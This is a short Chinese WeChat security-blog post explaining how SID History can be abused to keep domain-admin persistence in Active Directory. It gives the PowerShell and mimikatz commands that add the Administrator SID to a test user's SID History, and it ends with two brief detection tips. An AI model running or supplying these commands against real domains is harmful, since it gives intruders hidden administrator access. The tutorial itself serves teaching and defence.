点击上方蓝字关注我们
0x00 前言
SID的主要作用是跟踪安全主体控制用户连接资源时的访问权限。
SID History 是在域迁移过程中需要使用的一个属性,SID History 主要作用是在域迁移过程中保持域用户的访问权限,如果迁移后域用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。
因此使用mimikatz可以将SID History 属性添加到域中任意用户的SID History 属性中。
在域渗透中,如果获得了域管理员权限,就可以将SID History 作为域权限维持方法。
0x01 本地测试
1、首先将Administrator的SID添加到恶意用户test的SID History属性中,首先在powershell查看test用户的SID History 属性:
Import-Module ActiveDirectoryGet-ADUser test -Properties sidhistory
2、然后以管理员权限运行mimikatz,将Administrator的SID添加到test用户的SID History 属性中:
privilege::debugsid::patchsid::add /sam:test /new:administrator
3、再次查看test用户的SID History:
Get-ADUser test -Properties sidhistory
0x01 总结
1、检查SID为500的用户;
2、域迁移之后,对相同SID History 属性的用户进行检查;
往期文章:
长按关注
灼剑(Tsojan)安全团队
点个在看你最好看
本文始发于微信公众号(哈拉少安全小队):域渗透|域权限维持之SID History
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论